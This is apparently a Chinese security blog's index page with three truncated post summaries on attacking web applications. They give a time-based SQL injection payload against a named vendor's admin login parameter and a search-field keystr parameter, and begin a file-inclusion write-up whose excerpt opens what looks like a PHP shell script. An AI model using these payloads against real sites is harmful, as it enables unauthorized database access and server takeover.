摘要： 永拓科技默认后台为ytadmin/login.php UserName参数存在SQL注入 可使用%27%2b(select*from(select(sleep(5)))a)%2b%27进行判断 阅读全文

摘要： 访问看是否存在搜索功能，有可直接在搜索框进行SQL注入 未发现可以在URL后加入index.php?s=/Index/search.html 即可在页面发现一个搜索框，点击搜索 找到keystr参数 插入if(now()%3dsysdate()%2csleep(5)%2c0)/*'XOR(if(no 阅读全文

摘要： 写于2020-12-25 loadtemp和doviewhtml存在文件包含的可能。 直接构造数据包 还因为这里是json接口形式下发，所以输出结果会变成这样。 因为他是以json格式输出，所以在能解析PHP的情况下 <?php set_time_limit (0); $VERSION = "1.0 阅读全文